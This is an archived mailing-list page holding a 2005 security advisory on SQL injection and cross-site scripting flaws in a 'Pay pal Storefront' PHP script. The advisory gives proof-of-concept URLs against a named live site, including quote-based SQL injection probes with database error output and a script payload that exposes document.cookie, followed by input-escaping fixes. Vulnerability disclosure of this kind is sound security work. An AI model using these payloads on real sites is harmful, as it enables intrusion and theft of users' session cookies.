Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple sql injection, and xss vulnerabilities in Pay pal Storefront

from [Diabolic Crab] Network Security [Permanent Link]
Subject: Multiple sql injection, and xss vulnerabilities in Pay pal Storefront
Date: Wed, 30 Mar 2005 23:35:31 +0530 
 Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: High
Title: Multiple sql injection, and xss vulnerabilities in Pay pal Storefront
Date: March 25, 2005

Summary:
There are multiple sql injection, xss vulnerabilities in the Pay pal Storefront script.

Proof of Concept Exploits:

http://www.esmistudio.com/hv/ecdis/pages.php?idpages='SQL INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL INJECTION' at line 1

http://www.esmistudio.com/hv/ecdis/products1.php?id=6&id2='SQL INJECTION&subcat=Asus&p=products1
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL INJECTION ORDER BY title ASC LIMIT 0, 9' at line 1

http://www.esmistudio.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1
 This shows the cookie data. Possible fix: The usage of htmlspeacialchars(), 
mysql_escape_string(),mysql_real_escape_string() and other functions for input validation 
beforepassing user input to the mysql database, or before echoing data on thescreen, would 
solve these problems. Author: These vulnerabilties have been found and released by Diabolic 
Crab, Email:dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact 
meregarding these vulnerabilities. You can find me at,http://www.hackerscenter.com or 
http://icis.digitalparadox.org/~dcrab.Lookout for my soon to come out book on Secure coding 
with php.

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple sql injection, and xss vulnerabilities in Pay pal Storefront, Diabolic Crab <=
Previous by Date:  PaFileDB Version 3.1 and below are exploitable via a XSS and a SQL injection vulnerability, dcrab
Next by Date:  [Full-disclosure] [ GLSA 200503-36 ] netkit-telnetd: Buffer overflow, Thierry Carrez
Previous by Thread:  PaFileDB Version 3.1 and below are exploitable via a XSS and a SQL injection vulnerability, dcrab
Next by Thread:  [Full-disclosure] [ GLSA 200503-36 ] netkit-telnetd: Buffer overflow, Thierry Carrez
Indexes:  [Date] [Thread] [Top] [All Lists]